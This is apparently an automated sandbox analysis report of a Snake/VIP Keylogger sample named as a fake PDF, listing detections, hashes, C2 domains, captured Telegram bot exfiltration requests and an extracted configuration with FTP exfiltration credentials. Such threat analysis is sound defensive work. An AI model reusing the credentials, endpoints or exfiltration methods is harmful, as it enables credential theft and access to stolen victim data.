Windows Analysis Report
GeriOdemeBildirimi942.rar.xlxs.pdf.exe

Overview

General Information

Sample name: GeriOdemeBildirimi942.rar.xlxs.pdf.exe
Analysis ID: 1524790
MD5: be92b638000820878c7be0e70e257c95
SHA1: af9706bed063d07c65eac06773c8e6a1ed2e447a
SHA256: 407df9654a54792ee72730f5dae8bd303d7d92a24a5fe0a5bc83f634bab7a235
Tags: exegeoSnakeKeyloggerTURuser-abuse_ch
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Sigma detected: Suspicious Double Extension File Execution
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Connects to many ports of the same IP (likely port scanning)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses FTP
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
404 Keylogger, Snake Keylogger Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

AV Detection
barindex
Antivirus detection for URL or domain
Source: http://aborters.duckdns.org:8081 URL Reputation: Label: malware
Source: http://anotherarmy.dns.army:8081 URL Reputation: Label: malware
Found malware configuration
Source: 16.2.SOFcFE.exe.4475780.2.raw.unpack Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "FTP", "Username": "awaratre_log@awaratrendz.com", "Password": "mxH!EyDs(.jx", "FTP Server": "ftp://awaratrendz.com/", "Version": "4.4"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe ReversingLabs: Detection: 50%
Multi AV Scanner detection for submitted file
Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe Virustotal: Detection: 27% Perma Link
Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe ReversingLabs: Detection: 50%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe Joe Sandbox ML: detected

Location Tracking
barindex
Tries to detect the country of the analysis system (by using the IP)
Source: unknown DNS query: name: reallyfreegeoip.org
Uses 32bit PE files
Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49706 version: TLS 1.0
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49727 version: TLS 1.0
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49729 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49747 version: TLS 1.2
Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: NRtD.pdbSHA256 source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, SOFcFE.exe.1.dr
Source: Binary string: NRtD.pdb source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, SOFcFE.exe.1.dr
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 4x nop then jmp 0116F45Dh 14_2_0116F2C0
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 4x nop then jmp 0116F45Dh 14_2_0116F4AC
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 4x nop then jmp 0116FC19h 14_2_0116F961
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 4x nop then jmp 058A9280h 14_2_058A8FB0
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 4x nop then jmp 058AF13Eh 14_2_058AEE70
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 4x nop then jmp 058A7EB5h 14_2_058A7B78
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 4x nop then jmp 058A18A1h 14_2_058A15F8
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 4x nop then jmp 058A0FF1h 14_2_058A0D48
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 4x nop then jmp 058AE81Eh 14_2_058AE550
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 4x nop then jmp 058AC82Eh 14_2_058AC560
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 4x nop then jmp 058A6733h 14_2_058A6488
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 4x nop then jmp 058A0741h 14_2_058A0498
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 4x nop then jmp 058ADEFEh 14_2_058ADC30
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 4x nop then jmp 058ABF0Eh 14_2_058ABC40
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 4x nop then jmp 058A3709h 14_2_058A3460
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 4x nop then jmp 058A5A29h 14_2_058A5780
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 4x nop then jmp 058AFA5Eh 14_2_058AF790
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 4x nop then jmp 058ADA6Eh 14_2_058AD7A0
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 4x nop then jmp 058ABA7Eh 14_2_058AB7B0
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 4x nop then jmp 058A79C9h 14_2_058A7720
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 4x nop then jmp 058A2A01h 14_2_058A2758
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 4x nop then jmp 058AD14Eh 14_2_058ACE80
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 4x nop then jmp 058A2151h 14_2_058A1EA8
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 4x nop then jmp 058A5179h 14_2_058A4ED0
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 4x nop then jmp 058A48C9h 14_2_058A4620
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 4x nop then jmp 058A7119h 14_2_058A6E70
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 4x nop then jmp 058A1449h 14_2_058A11A0
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 4x nop then jmp 058AECAEh 14_2_058AE9E0
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 4x nop then jmp 058ACCBEh 14_2_058AC9F0
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 4x nop then mov esp, ebp 14_2_058AB089
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 4x nop then mov esp, ebp 14_2_058AB098
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 4x nop then jmp 058AE38Eh 14_2_058AE0C0
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 4x nop then jmp 058AC39Eh 14_2_058AC0D0
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 4x nop then jmp 058A0B99h 14_2_058A08F0
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 4x nop then jmp 058A32B1h 14_2_058A3008
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 4x nop then jmp 058A62D9h 14_2_058A6030
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 4x nop then jmp 058A02E9h 14_2_058A0040
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 4x nop then jmp 058A2E59h 14_2_058A2BB0
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 4x nop then jmp 058A5E81h 14_2_058A5BD8
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 4x nop then jmp 058A25A9h 14_2_058A2300
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 4x nop then jmp 058AF5CEh 14_2_058AF300
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 4x nop then jmp 058AD5DEh 14_2_058AD310
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 4x nop then jmp 058A55D1h 14_2_058A5328
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 4x nop then jmp 058AB5EEh 14_2_058AB320
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 4x nop then jmp 058A7571h 14_2_058A72C8
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 4x nop then jmp 058A6CC1h 14_2_058A6A18
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 4x nop then jmp 058A1CF9h 14_2_058A1A50
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 4x nop then jmp 058A4D21h 14_2_058A4A78
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Code function: 4x nop then jmp 02C3F2EDh 20_2_02C3F3BF
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Code function: 4x nop then jmp 02C3F2EDh 20_2_02C3F33C
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Code function: 4x nop then jmp 02C3F2EDh 20_2_02C3F150
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Code function: 4x nop then jmp 02C3FAA9h 20_2_02C3F7F1
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Code function: 4x nop then jmp 06A731E8h 20_2_06A72DD0
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Code function: 4x nop then jmp 06A70D0Dh 20_2_06A70B30
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Code function: 4x nop then jmp 06A71697h 20_2_06A70B30
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Code function: 4x nop then jmp 06A72C21h 20_2_06A72970
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Code function: 4x nop then jmp 06A7F8C9h 20_2_06A7F620
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 20_2_06A70673
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Code function: 4x nop then jmp 06A7DA61h 20_2_06A7D7B8
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Code function: 4x nop then jmp 06A7D1B1h 20_2_06A7CF08
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Code function: 4x nop then jmp 06A7E769h 20_2_06A7E4C0
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Code function: 4x nop then jmp 06A7DEB9h 20_2_06A7DC10
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Code function: 4x nop then jmp 06A731E8h 20_2_06A72DCA
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Code function: 4x nop then jmp 06A7F019h 20_2_06A7ED70
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Code function: 4x nop then jmp 06A7FD21h 20_2_06A7FA78
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Code function: 4x nop then jmp 06A7D609h 20_2_06A7D360
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Code function: 4x nop then jmp 06A7E311h 20_2_06A7E068
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 20_2_06A70040
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 20_2_06A70853
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Code function: 4x nop then jmp 06A7F471h 20_2_06A7F1C8
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Code function: 4x nop then jmp 06A731E8h 20_2_06A73116
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Code function: 4x nop then jmp 06A7EBC1h 20_2_06A7E918

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2845532 - Severity 1 - ETPRO MALWARE SnakeKeylogger Exfil via FTP M1 : 192.168.2.7:49748 -> 119.18.54.39:21
Connects to many ports of the same IP (likely port scanning)
Source: global traffic TCP traffic: 119.18.54.39 ports 43366,1,2,32582,47782,21
Uses the Telegram API (likely for C&C communication)
Source: unknown DNS query: name: api.telegram.org
Yara detected Generic Downloader
Source: Yara match File source: 20.2.SOFcFE.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.4926f20.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.SOFcFE.exe.4475780.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.SOFcFE.exe.4431b60.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.478ac68.2.raw.unpack, type: UNPACKEDPE
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.7:49742 -> 119.18.54.39:43366
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:724471%0D%0ADate%20and%20Time:%2003/10/2024%20/%2015:39:59%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20724471%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:724471%0D%0ADate%20and%20Time:%2003/10/2024%20/%2021:14:30%0D%0ACountry%20Name:%20%0D%0A%5B%20724471%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 132.226.8.169 132.226.8.169
Source: Joe Sandbox View IP Address: 149.154.167.220 149.154.167.220
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View ASN Name: PUBLIC-DOMAIN-REGISTRYUS PUBLIC-DOMAIN-REGISTRYUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
May check the online IP address of the machine
Source: unknown DNS query: name: checkip.dyndns.org
Source: unknown DNS query: name: reallyfreegeoip.org
Source: unknown DNS query: name: checkip.dyndns.org
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49711 -> 193.122.130.0:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49713 -> 193.122.130.0:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49726 -> 132.226.8.169:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49705 -> 193.122.130.0:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49715 -> 193.122.130.0:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49717 -> 132.226.8.169:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49709 -> 193.122.130.0:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49721 -> 132.226.8.169:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49722 -> 132.226.8.169:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49731 -> 132.226.8.169:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49716 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49743 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49719 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49708 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49735 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49728 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49732 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49730 -> 188.114.96.3:443
Uses FTP
Source: unknown FTP traffic detected: 119.18.54.39:21 -> 192.168.2.7:49737 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 20 of 150 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 20 of 150 allowed.220-Local time is now 12:46. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 20 of 150 allowed.220-Local time is now 12:46. Server port: 21.220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 20 of 150 allowed.220-Local time is now 12:46. Server port: 21.220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49706 version: TLS 1.0
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49727 version: TLS 1.0
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
